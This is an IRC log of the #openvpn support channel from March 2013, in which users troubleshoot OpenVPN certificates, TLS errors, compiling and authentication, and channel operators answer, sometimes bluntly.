Rice, the Volume goes to 11 here. (at funroll-loops.info) 00:07 <@EugeneKay> GabeTheBabe - "VPNTunnel" is not OpenVPN. Sorry. 00:07 <@EugeneKay> Try talking to your service provider's support. 00:08 < pekster> EugeneKay: Volume only goes to 11? I'll sell you a gcc that goes to 12 for just $50k ;) 00:08 <@EugeneKay> It looks to me like a shitty Java stack 00:08 < GabeTheBabe> I know it's not :o it's been 4 days and I've got like 3 left on my VPN anyways :x 00:08 <@EugeneKay> pekster - zomg does it -O3? 00:08 < pekster> -O999 00:08 < pekster> geez :P 00:08 < GabeTheBabe> gonna not resub if they don't email me a fix :P 00:09 -!- vraa__ [~speed_rac@98.196.168.201] has quit [Ping timeout: 245 seconds] 00:10 < GabeTheBabe> openvpn is a pain to setup with certs and stuff T_T 00:11 <@EugeneKay> XCA makes PKI a lot easier 00:12 < GabeTheBabe> people have to be familiar with acronyms for them to be effective :P 00:13 < pekster> It would naturally help if you GNU them all in advance 00:13 < pekster> !xca 00:13 <@vpnHelper> "xca" is (#1) XCA is a GUI to create/manage a PKI, much more user-friendly than easy-rsa. or (#2) Example XCA PKI for OpenVPN(writeup pending): https://community.openvpn.net/openvpn/wiki/XCA 00:19 < p3rror> hello 00:19 < p3rror> please Why I get this error TLS Error: Unroutable control packet received from [AF_INET] 00:19 < p3rror> whe i try to connect 00:25 < p3rror> pekster, you there 00:25 < p3rror> please can you help 00:33 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Excess Flood] 00:35 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 00:45 -!- GabeTheBabe [~toomuchfo@75-170-24-37.eugn.qwest.net] has left #openvpn [] 01:07 -!- p3rror [~mezgani@41.140.169.138] has quit [Ping timeout: 245 seconds] 01:09 -!- merica [~aMERICA@75.111.203.42] has joined #openvpn 01:15 -!- p3rror [~mezgani@41.140.169.138] has joined #openvpn 01:17 -!- p3rror [~mezgani@41.140.169.138] has quit [Max SendQ exceeded] 01:17 -!- p3rror [~mezgani@ds-59836.dedicados.laniway.com.br] has joined #openvpn 01:22 -!- merica [~aMERICA@75.111.203.42] has quit [Read error: Connection reset by peer] 01:22 -!- p3rror [~mezgani@ds-59836.dedicados.laniway.com.br] has quit [Quit: Leaving] 01:23 -!- merica [~aMERICA@75.111.203.42] has joined #openvpn 01:41 -!- merica [~aMERICA@75.111.203.42] has quit [Read error: Connection reset by peer] 01:43 -!- merica [~aMERICA@75.111.203.42] has joined #openvpn 01:43 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 02:12 -!- merica [~aMERICA@75.111.203.42] has left #openvpn [] 02:56 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 02:58 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Client Quit] 03:08 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 03:27 -!- dropje [~yge@ip4da6274e.direct-adsl.nl] has quit [Ping timeout: 256 seconds] 03:28 -!- brute11k1 [~brute@89.249.235.15] has joined #openvpn 03:29 -!- brute11k [~brute@89.249.235.15] has quit [Ping timeout: 245 seconds] 03:31 -!- brute11k [~brute@89.249.235.15] has joined #openvpn 03:32 -!- brute11k1 [~brute@89.249.235.15] has quit [Ping timeout: 252 seconds] 03:42 -!- brute11k [~brute@89.249.235.15] has quit [Ping timeout: 255 seconds] 03:43 -!- p3rror [~mezgani@ds-59836.dedicados.laniway.com.br] has joined #openvpn 03:47 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 04:24 -!- zz_AsadH is now known as AsadH 05:14 -!- p3rror [~mezgani@ds-59836.dedicados.laniway.com.br] has quit [Ping timeout: 260 seconds] 05:23 < jzaw> pekster, that weird asymmetrical ping on the tun vpn ... fixed M0N0WALL arrgh 05:23 < jzaw> http://photos.dzki.co.uk/m0n0wall_adv_setting_bypass_fw_same_interface.png 05:23 < jzaw> possibly something to do with icmp redirect 05:23 < jzaw> anyhoo thanks for all your help 05:27 -!- p3rror [~mezgani@41.140.169.138] has joined #openvpn 05:35 -!- hatschi [~marvin@host-62-245-234-8.customer.m-online.net] has joined #openvpn 05:36 < hatschi> hi all 05:38 < hatschi> pekster: are you there? 06:01 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 06:02 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 06:07 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 256 seconds] 06:13 -!- mjixx [~markus@80.67.14.31] has quit [Ping timeout: 245 seconds] 06:14 -!- Bakou [~meh@199.101.117.191] has joined #openvpn 06:15 < Bakou> hey guys, I am doing a little experiment and trying to tunnel openvpn through a udp tunnel I wrote 06:15 < Bakou> but after accepting the handshake and getting connected no data can be sent 06:16 < Bakou> is there some limitation about both the client and server being at localhost,or forwarding the packets? 06:16 < Bakou> the same thing works fine through SSH tunneling w/ tcp 06:20 -!- mjixx [~markus@80.67.14.31] has joined #openvpn 06:25 -!- Bakz [~meh@210.56.51.163] has joined #openvpn 06:29 -!- Bakou [~meh@199.101.117.191] has quit [Ping timeout: 256 seconds] --- Log closed Tue Mar 12 06:35:29 2013 --- Log opened Tue Mar 12 06:35:43 2013 06:35 -!- ecrist_ [~ecrist@token-black.secure-computing.net] has joined #openvpn 06:35 -!- Irssi: #openvpn: Total of 174 nicks [8 ops, 0 halfops, 2 voices, 164 normal] 06:36 -!- Irssi: Join to #openvpn was synced in 45 secs 06:37 -!- lbft__ [~lbft@199.195.249.177] has joined #openvpn 06:38 -!- soapee01_ [~soapee01@24-155-219-177.dyn.grandenetworks.net] has joined #openvpn 06:38 -!- piele_ [~Unknown@bakzeil.creativeserver.net] has joined #openvpn 06:39 -!- feth_ [foobar@ile-flottante.tuttu.info] has joined #openvpn 06:40 < vaillor> TLS Error: client->client or server->server connection attempted from 229.76.227.83:5001 06:40 < vaillor> could it be a problem with certificates? 06:43 -!- simcop2387_ [~simcop238@p3m/member/simcop2387] has joined #openvpn 06:43 -!- Netsplit *.net <-> *.split quits: _quadDamage, +soapee01, simcop2387, vect0rx, @ecrist, feth, lbft, DrCode, piele 06:43 -!- simcop2387_ is now known as simcop2387 06:48 -!- feth_ is now known as feth 06:53 -!- marksaitis [~marksaiti@81.101.81.114] has joined #openvpn 06:57 -!- You're now known as ecrist 06:58 -!- mode/#openvpn [+o ecrist] by ChanServ 07:04 -!- kubbing [~kubbing@c-006.certicon.cz] has joined #openvpn 07:13 -!- kubbing [~kubbing@c-006.certicon.cz] has quit [Ping timeout: 252 seconds] 07:14 -!- kubbing [~kubbing@gprs29.vodafone.cz] has joined #openvpn 07:15 -!- dazo_afk is now known as dazo 07:25 <@ecrist> !ubuntu 07:25 <@vpnHelper> "ubuntu" is dont use network manager! 07:25 <@ecrist> !networkmanager 07:25 <@ecrist> !netman 07:26 <@vpnHelper> "netman" is if you are using network manager for linux to configure your vpn, dont! http://openvpn.net/archive/openvpn-users/2008-01/msg00046.html to read the same thing from the author of the openvpn 2 cookbook on the mail list 07:30 < vaillor> ecrist,, do do you think that "TLS Error: client->client or server->server connection attempted from 229.76.227.83:5001" is a problem about certificates? 07:31 <@ecrist> anything, generally, that mentions TLS Error has to do with certificates 07:32 -!- newbie [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn 07:32 < vaillor> ecrist: http://pastebin.com/NRC1dCMk 07:32 < vaillor> this is my config 07:33 < vaillor> what do you thing should be the problem? 07:33 <@ecrist> !logs 07:33 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 07:36 < vaillor> ecrist, server side or client side? 07:36 <@ecrist> yup 07:36 < vaillor> both? 07:36 <@ecrist> yup 07:36 <@ecrist> it says that, above 07:36 <@ecrist> 07:33:56 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server 07:36 < vaillor> yes, sorry 07:37 < vaillor> on windows gui is blank 07:37 < vaillor> i don't know why 07:37 < vaillor> !logfile 07:37 <@vpnHelper> "logfile" is (#1) openvpn will log to syslog if started in daemon mode. You can manually specify a logfile with: log /path/to/logfile or (#2) verb 3 is good for everyday usage, verb 5 for debugging or (#3) see --daemon --log and --verb in the manual (!man) for more info 07:38 -!- kubbing [~kubbing@gprs29.vodafone.cz] has quit [Remote host closed the connection] 07:39 -!- kubbing [~kubbing@c-006.certicon.cz] has joined #openvpn 07:41 < vaillor> ecrist: http://sprunge.us/TAUP 07:42 <@ecrist> this is an old log 07:42 <@ecrist> Also, you're running an old version of OpenVPN 07:43 < vaillor> i installed it from apt-get 07:43 <@ecrist> it's out of date 07:43 < vaillor> how to upgrade it? 07:45 <@ecrist> !download 07:45 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 07:45 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 07:45 <@ecrist> also, I need a current log 07:45 <@ecrist> the one you posted is 2 days old 07:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 255 seconds] 07:46 < vaillor> ihttp://sprunge.us/ZTCH 07:46 < vaillor> http://sprunge.us/ZTCH 07:46 < vaillor> is right 07:46 < vaillor> date and time are wrong on the system 07:47 <@ecrist> fix it 07:49 < vaillor> ecrist, which version of openvpn do i need? 07:49 <@ecrist> 2.3.0 07:49 <@ecrist> see /topic 07:50 < vaillor> ok, let me get and install it 07:52 <@ecrist> fix the time on that box, too 07:54 < vaillor> done 07:54 < vaillor> ecrist, can you explain /why/ do i need that version? 07:54 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:54 <@ecrist> vaillor: standard policy that we only support the latest version 08:00 -!- kubbing [~kubbing@c-006.certicon.cz] has quit [Remote host closed the connection] 08:00 < vaillor> vaillor: whose standard policy, I mix it for multiple sites at many levels and don't get issues - seems to me something else is wrong 08:01 <@ecrist> our (#openvpn) standard policy 08:01 <@ecrist> there have been a LOT of changes since 2.1.x 08:02 -!- hatschi [~marvin@host-62-245-234-8.customer.m-online.net] has quit [Ping timeout: 245 seconds] 08:03 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 08:03 -!- hatschi [~marvin@host-62-245-234-8.customer.m-online.net] has joined #openvpn 08:07 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 245 seconds] 08:20 -!- bahzman [~meh@58.34.152.207] has joined #openvpn 08:21 -!- hatschi [~marvin@host-62-245-234-8.customer.m-online.net] has quit [Read error: Connection reset by peer] 08:21 -!- Bakz [~meh@210.56.51.163] has quit [Ping timeout: 252 seconds] 08:22 -!- hatschi [~marvin@host-62-245-234-8.customer.m-online.net] has joined #openvpn 08:23 < vaillor> ecrist, on windows i shuld use tun or tap? 08:28 <@ecrist> the client needs to match what the server is using 08:28 <@ecrist> in most cases, that's tun 08:29 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn 08:29 < TheWarden> !welcome 08:29 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 08:30 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 08:31 < vaillor> ecrist, certs should be created all on server? 08:31 < TheWarden> Hi, I've recently installed OpenVPN and I was successful in authenticating to the VPN. However I want to remove a user I added. I tried running . /etc/openvpn/easy-rsa/2.0/vars and now I'm getting this "-bash: /etc/openvpn/easy-rsa/whichopensslcnf: No such file or directory", how do I fix this? 08:31 -!- Bakou [~meh@58.34.36.134] has joined #openvpn 08:31 <@ecrist> vaillor: why are you re-creating the certs? 08:32 <@ecrist> TheWarden: did you use easy-rsa to generate the certificates, or something else? 08:32 < vaillor> is possible that certs i created yesterday could be broken 08:32 < vaillor> ? 08:32 < TheWarden> ecrist: I only uses easy-rsa 08:32 < TheWarden> used* 08:32 <@ecrist> vaillor: at this point, I don't think so 08:32 <@ecrist> TheWarden: did you use it on the box your trying to use it on now? 08:33 < vaillor> ecrist is there a way to know that certs are good? 08:33 < TheWarden> ecrist: yes I did 08:33 -!- bahzman [~meh@58.34.152.207] has quit [Ping timeout: 252 seconds] 08:34 < TheWarden> I ran that command before so this is why I'm so confused as to why its not working. I just had it working and no changes have been done to it since then. It was just yesterday I set this all up. 08:34 <@ecrist> you didn't run a cleanall at some point, did you? 08:34 < TheWarden> ecrist: yes I believe I did and I just did this morning to be honest. 08:35 <@ecrist> cleanall is bad 08:35 <@ecrist> it deletes your entire CA structure 08:36 < TheWarden> oh crap, well that sucks. Ahh strange as the keys is still present along with the client files I created. 08:36 < TheWarden> I'll re do ca and client again then to fix this? 08:36 <@ecrist> sounds like that might be the easiest thing to start with 08:36 < TheWarden> ecrist: okay 08:36 <@ecrist> if you have a lot of clients, we can try to get things working 08:37 * ecrist really doesn't like current easy-rsa 08:37 <@ecrist> !ssl-admin 08:37 <@vpnHelper> "ssl-admin" is (#1) if you use freebsd, it is in ports or (#2) svn co https://www.secure-computing.net/svn/trunk/ssl-admin to grab it from svn or (#3) A perl script for managing SSL certificates (being a CA). Makes a good replacement for easy-rsa 08:38 < TheWarden> ecrist: no, I just set it up so there is only one client. Its no trouble to re-do... I just make note to not run that command again. All I wanted to do was re-create the client. 08:40 -!- hatschi [~marvin@host-62-245-234-8.customer.m-online.net] has quit [Ping timeout: 260 seconds] 08:42 -!- mezgani [~mezgani@41.140.99.173] has joined #openvpn 08:42 < vaillor> ecrist, can you tell me an how to to complie openvpn 2.3.0 ? 08:43 <@ecrist> download source, cd , ./configure && make && make install 08:44 < rob0> ecrist! You forgot to extract the source from the tarball! How could you be so CRUEL? 08:44 <@ecrist> lol 08:44 -!- p3rror [~mezgani@41.140.169.138] has quit [Ping timeout: 252 seconds] 08:45 -!- sejo [~SeJo@fosdem/staff/sejo] has left #openvpn [] 08:47 < vaillor> checking git checkout... no 08:47 < vaillor> configure: error: lzo enabled but missing 08:49 <@ecrist> you need to have lzo installed, or disable it in your configure command 08:49 <@ecrist> ./configure --help 08:49 -!- vect0rx [vectorx@havok.org] has joined #openvpn 08:50 < TheWarden> Does easy-rsa really need to be installed at /etc/openvpn/easy-rsa? Really it shouldn't be there as it should be stored in say /opt/ or /usr/local/. 08:50 < vaillor> i can install it 08:50 < vaillor> can you tell me the name of the package please? 08:52 <@ecrist> TheWarden: you can install it anywhere you like, but you might need to edit the scripts for pathing 08:52 < TheWarden> so if I want to revoke/remove a client is i true I would do ". /etc/openvpn/easy-rsa/2.0/vars" then ". /etc/openvpn/easy-rsa/2.0/revoke-full client1" ? 08:52 <@ecrist> one of the things we plan on fixing 08:52 <@ecrist> putting it in /usr/local is canonical across unix OSes 08:52 <@ecrist> correct. 08:52 < TheWarden> ecrist: Oh I see okay, well for now I'll leave it be then. 08:53 < TheWarden> ecrist: ahh okay, thanks. 08:54 < vaillor> liblzo2-dev or liblzo2-2 ? 08:54 < TheWarden> So I have OpenVPN installed and a client installed and working. Which is admittingly really cool and exciting as this is my first VPN I've ever setup. However, my next hurdle is how can I some how make the the VPN authenticate to the domain (active directory)? 08:56 < TheWarden> So saying this, the user would authenticate to the VPN and then automatically be authenticated to the domain. Maybe this is not possible, I dunno. 08:57 < TheWarden> Oh the other thing is, this may not be ideal but the fact is the network the VPN client is connecting to is on 192.168 and the VPN is using 10.8. Presently when the client is authenticated to the VPN the client is not able to access 192.168, how can this be fixed? Yes I've tried ping and that doesn't work. 09:00 < Holiday> TheWarden: I'm no openvpn pro (trust me, some of the guys can attest with the setup/issue I have lol) but I happened across this and didn't know if it'd help you: https://community.openvpn.net/openvpn/wiki/RelatedProjects#Authentication 09:00 <@vpnHelper> Title: RelatedProjects – OpenVPN Community (at community.openvpn.net) 09:01 < TheWarden> Holiday: thanks, I'll have a look. 09:01 -!- HyperGlide [~HyperGlid@221.237.121.63] has joined #openvpn 09:02 < Holiday> TheWarden: (heck those many be included anymore or something I don't have a clue.. and some of the GUI clients for Windows listed there appear to be rather dated and haven't been updated in some time) 09:03 <@ecrist> TheWarden: if you can setup PAM on the openvpn server to auth with active directory, openvpn includes an auth pam module 09:04 < Holiday> ecrist: I'm sure that's a lot easier than maybe this one I found on that link: https://code.google.com/p/openvpn-auth-ldap/ 09:04 <@vpnHelper> Title: openvpn-auth-ldap - LDAP authentication and authorization plugin for OpenVPN 2.x - Google Project Hosting (at code.google.com) 09:04 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 09:04 < vaillor> ecrist, finished ./configure && make && make install 09:04 < vaillor> now, what else do i need? 09:05 < TheWarden> ecrist: mmm not sure if I can or not. The system running OpenVPN also is the Active Directory Domain Controller if that helps. 09:05 < TheWarden> Holiday: I was looking at that actually openvpn-auth-ldap but no clue where to begin. If PAM will work and its already built in that sounds better to me. 09:06 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: Lost terminal] 09:06 < Holiday> yeah the pam method is what we use here for a lot of stuff 09:06 < TheWarden> oh another thing, I know I'm throwing at lot out there at once... where can I get an init.d script for OpenVPN? It works manually right now but I really need an init.d script. I'm running OpenVPN on Debian Squeeze. 09:07 <@ecrist> TheWarden: I've never setup PAM with AD on a windows machine. 09:07 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 09:08 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 250 seconds] 09:09 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 09:11 < vaillor> ecrist, so? is there a command to install the package after compilation? 09:11 < vaillor> because when i try to run openvpn, i get "command not found" 09:13 < TheWarden> ecrist: oh okay, no problem. 09:13 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 09:13 < TheWarden> Holiday: so your using PAM to authenticate to Active Directory Domain Controller? 09:14 < TheWarden> vaillor: if OpenVPN is installed, you may need to run with sudo in order for it to work. 09:14 < TheWarden> So is there an init.d script that comes with OpenVPN? I haven't found one as of yet. 09:15 < vaillor> TheWarden, openvpn is not installed 09:15 < vaillor> and i'm as a root 09:15 < TheWarden> vaillor: what OS are you using? 09:15 < rob0> The init.d script, if any, is provided by your OS/distro. 09:17 < vaillor> debian 09:17 < TheWarden> rob0: Oh, well that seems odd to me. Debian does not develop nor is it involved with OpenVPN so I can't see them providing it. I'll have to write one. Shouldn't be too hard as I've done some in the past. 09:17 < TheWarden> vaillor: ahh okay, well I actually just did an install on Debian Squeeze. I following this for the most part, http://wingloon.com/2012/05/25/how-to-install-setup-openvpn-on-debian-6-0-squeeze-with-certificate-authentication/ 09:17 <@vpnHelper> Title: How To Install Setup OpenVPN on Debian 6.0 Squeeze with Certificate Authentication | WING LOON (at wingloon.com) 09:18 < TheWarden> vaillor: keep in mind I said for the most part, it depends on what you want and what your system configuration is and is going to be. 09:20 < rob0> TheWarden, did you look in the Debian openvpn package? 09:20 < TheWarden> rob0: no I haven't but that would be a good start :-), I installed from OpenVPN repository to get the latest stable. 09:21 < vaillor> TheWarden, i downloaded directly 2.3.0 sources 09:21 < vaillor> and compiled them 09:21 < TheWarden> vaillor: oh really, the repository would have been a better option via OpenVPN at least in my opinion. Either way all should be similar, granted if you have experience doing such things before in the past. 09:22 < Holiday> TheWarden: yes but not with OpenVPN (other utilities). Our openvpn still isn't 100% yet 09:23 < TheWarden> Holiday: well true, but I got it up and running fairly fast I found. It took time and a lot of reading but it paid off. 09:25 -!- brute11k [~brute@89.249.231.191] has joined #openvpn 09:31 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Excess Flood] 09:32 <@ecrist> vaillor: if you ran the make install command, it should be installed 09:32 <@ecrist> depending on your shell, you may need to run "rehash" 09:34 < vaillor> ecrist, make[1]: Leaving directory `/etc/openvpn2/openvpn-2.3.0 09:34 < vaillor> this is the last line of make install 09:35 < vaillor> it means that all went fine? 09:38 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 09:41 -!- mezgani [~mezgani@41.140.99.173] has quit [Quit: Leaving] 09:49 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 255 seconds] 09:49 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 09:50 <@ecrist> vaillor: run this - find / -name openvpn -type f 09:54 < vaillor> root@debian-VM:/etc/openvpn2/openvpn-2.3.0# find / -name openvpn -type f 09:54 < vaillor> /usr/local/sbin/openvpn 09:54 < vaillor> /etc/openvpn2/openvpn-2.3.0/src/openvpn/openvpn 09:58 -!- lbft__ is now known as lbft 10:05 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 10:05 < TheWarden> When generating the client's crt and key it prompts for "A challenge password". I entered one but I noticed that when the client connects to the VPN it doesn't prompt to input a password. Is this normal behavior? All VPNs I've ever used I've had to input a password or username and password. 10:09 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 260 seconds] 10:11 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: Lost terminal] 10:14 < vaillor> TheWarden 10:14 < vaillor> i used your guide 10:15 < vaillor> but when i try to connect i get: 10:15 < vaillor> Tue Mar 12 16:13:29 2013 MANAGEMENT: Socket bind failed on local address [AF_INET]127.0.0.1:25340: Address already in use (WSAEADDRINUSE) 10:15 < vaillor> Tue Mar 12 16:13:29 2013 Exiting due to fatal error 10:16 <@ecrist> vaillor: /usr/local/sbin/openvpn is the binary you want to use then 10:16 <@ecrist> vaillor: let me see your config, please 10:17 -!- raidz_away is now known as raidz 10:18 < vaillor> ecrist: http://pastebin.com/HYP6K2is 10:21 < vaillor> this is server side: http://pastebin.com/x2Fqgpzy 10:21 < TheWarden> vaillor: I think ecrist could help a lot more than me in this area. I may have just lucked out to get mine working but it appears to continue to work without issues. Granted I did edit my router/firewall to do port forwarding as well. Not all things are on that page. 10:22 < vaillor> I'm going crazy :) 10:25 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds] 10:31 < vaillor> ecrist, i geave you configuration 10:32 < TheWarden> vaillor: can you list the contents of /etc/openvpn ? 10:32 < TheWarden> vaillor: when you uses easy-rsa did you use 1.0 or 2.0? 10:34 < vaillor> 2.0 10:36 < TheWarden> vaillor: okay, well I could be wrong here but I believe the server.conf should change the line # 7 to dh dh2048.pem 10:36 < TheWarden> vaillor: I need to see the contents of /etc/openvpn please, just do a ls -al and then copy/paste the results to a pastebin for me to see. 10:37 < vaillor> TheWarden 10:37 < vaillor> Tue Mar 12 16:13:29 2013 MANAGEMENT: Socket bind failed on local address [AF_INET]127.0.0.1:25340: Address already in use (WSAEADDRINUSE) 10:37 < vaillor> Tue Mar 12 16:13:29 2013 Exiting due to fatal error 10:37 < vaillor> this is my error 10:37 < TheWarden> vaillor: okay, well lets start where I'm looking at first please. 10:38 < vaillor> what? 10:43 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 10:47 -!- Bakz [~meh@184.75.214.42] has joined #openvpn 10:49 -!- Bakou [~meh@58.34.36.134] has quit [Ping timeout: 250 seconds] 10:49 -!- brute11k [~brute@89.249.231.191] has quit [Ping timeout: 248 seconds] 10:51 < TheWarden> vaillor: okay, can you please run the following command without quotes and copy/paste the results to a pastebin for me to look at, "ls -al". 10:52 <@ecrist> vaillor: it seems you already have openvpn running 10:53 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 264 seconds] 10:53 -!- mattock [~mattock@openvpn/corp/admin/mattock] has quit [Ping timeout: 264 seconds] 10:53 -!- mattock [~mattock@raidz.im] has joined #openvpn 10:53 -!- mattock [~mattock@raidz.im] has quit [Changing host] 10:53 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 10:54 -!- mode/#openvpn [+o mattock] by ChanServ 10:54 < vaillor> ecrist, is it running 10:54 -!- abec0 [olivier@vvma.net] has quit [Ping timeout: 264 seconds] 10:54 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Ping timeout: 264 seconds] 10:54 -!- abec0_ [olivier@vvma.net] has joined #openvpn 10:54 < vaillor> on the server i get "initialization sequence completed 10:54 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 10:55 < vaillor> brb 10:55 -!- vaillor [~ahah@2-226-37-187.ip179.fastwebnet.it] has quit [] 10:57 -!- bahzman [~meh@58.34.36.134] has joined #openvpn 10:57 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 10:57 < tabakhase> ARG, what is that shit?! - server on unix, clients on unix can connect just fine - windows clients die saying "tls_read_plaintext error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed" - on depth=1 (so the self signed cname=vpn-CA) 10:58 < tabakhase> more fun: another windows box, with an oder openvpn version - seems to connect just fine 10:58 -!- vaillor [~ahah@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn 10:58 < tabakhase> oder=older 10:58 < vaillor> ecrist: http://pastebin.com/jKwsQ4nC 11:00 -!- Bakz [~meh@184.75.214.42] has quit [Ping timeout: 248 seconds] 11:00 -!- Bakou [~meh@058177188234.ctinets.com] has joined #openvpn 11:02 -!- bahzman [~meh@58.34.36.134] has quit [Ping timeout: 255 seconds] 11:04 -!- Bakz [~meh@58.34.36.134] has joined #openvpn 11:05 < Holiday> can someone give me a clue on what the heck I'm missing.. windows client vpn (tap) to linux box, bridge setup. tcpdump shows traffic (say ping and arp who-has requests) from the vpn client on tap0 and br0, but nothing on eth1 (the card in the bridge) 11:05 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 11:05 < Holiday> net.bridge.bridge-nf-call-iptables = 0 (and just in case there's the input -i tap0 -j accept deals in iptables) 11:06 < Holiday> and none of the arp who-has are obviously receiving a reply 11:06 <@dazo> Holiday: why do you bridge? 11:06 <@dazo> tabakhase: http://www.catb.org/~esr/faqs/smart-questions.html#examples 11:06 <@vpnHelper> Title: How To Ask Questions The Smart Way (at www.catb.org) 11:07 < Holiday> dazo: lol you should remember :) Because 1: the main guy wants it as if they were plugged right into the switches because of some of the devel work and applications we have running 11:07 -!- Bakou [~meh@058177188234.ctinets.com] has quit [Ping timeout: 256 seconds] 11:07 < Holiday> and it's beyond my control so I'm working within those constraints 11:07 <@dazo> oh my goodness .... that's you .... okay .... then I have no idea :) 11:08 < Holiday> lol 11:08 < tabakhase> dazo if i had an idea what more info could be helpfull... im stuck on "having clients that work" so it dosnt realy seem to be a configuration problem... 11:08 < tabakhase> been hoping for a "yes, new win version needs cert in form XY and it will work" or a simillar punchline i missed... 11:08 <@ecrist> tabakhase: full logs from non-working client, please 11:08 < Holiday> dazo: I think I picked your brain a few times before.. still hung up and he still won't go TUN :( 11:08 <@dazo> Holiday: you can go that guy and quote me: Grow up and start setting up networking in a better way - by using routing 11:09 < vaillor> dazo: http://pastebin.com/jKwsQ4nC 11:09 <@dazo> Holiday: and if doesn't accept it .... then another quote from me: You're a lost case 11:09 < vaillor> can you check this please? 11:10 < Holiday> dazo: I did try to look into the TUN, but if I go that route I'll still need to get the clients into a .126-145 IP range.. since it's still all public IP's 11:10 <@dazo> tabakhase: no, certificate formats have not changed ... in fact, it's all standard X.509 certificates, PEM formatted 11:10 < Holiday> dazo: I wish you could just trout slap him for me lol 11:10 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Ping timeout: 264 seconds] 11:10 * dazo goes to his freezer and pulls out a big frozen trout 11:11 <@dazo> tabakhase: so then you're back at reading the topic ... which explains all we need here 11:11 <@EugeneKay> Ooooh, trout! 11:11 < tabakhase> ecrist also want the certs themself? its allll in http://nopaste.info/c2debc94a2.html 11:11 * EugeneKay gets fresh lemon and seasonings 11:11 < Holiday> dazo: honestly it's not much skin off of my back.. if this doesn't work soon (either openvpn or ipsec/l2tp the way *he wants*, the other guy is just going to pull the trigger and get the vpn add-ons for the checkpoint firewall lol) 11:11 < Holiday> but still I just wanted to say I appreciated all the past help I received 11:12 < Holiday> err other guy = another guy 11:12 <@ecrist> tabakhase: no, do not give me certs 11:12 < vaillor> i spent 6 days trying to configure a client and server vpn, why is it so difficult? 11:12 <@EugeneKay> Holiday - the fact that you're using something called "Checkpoint Firewall" is an indication that you should run like fuck from the project 11:12 <@EugeneKay> vaillor - because you are an idiot who doesn't know how to read 11:12 <@ecrist> EugeneKay++ 11:12 < tabakhase> ecrist so skip lines 28 till 74 in the paste ;-) 11:12 < Holiday> EugeneKay: They were using the cisco's but recently upgraded to the checkpoints (that was the security guys not me) 11:13 < vaillor> EugeneKay, i follow 5 howto, but i always get errors 11:13 < vaillor> every kind of error 11:13 <@EugeneKay> vaillor - I really don't care anymore 11:13 < vaillor> ecrist, have you seen the config you asked me? 11:13 <@EugeneKay> vaillor - at this point you're just being a help vampire. Go back and try to understand what is going on, but please, stop trying to get us to do it for you 11:14 <@EugeneKay> Because we won't. 11:14 < vaillor> 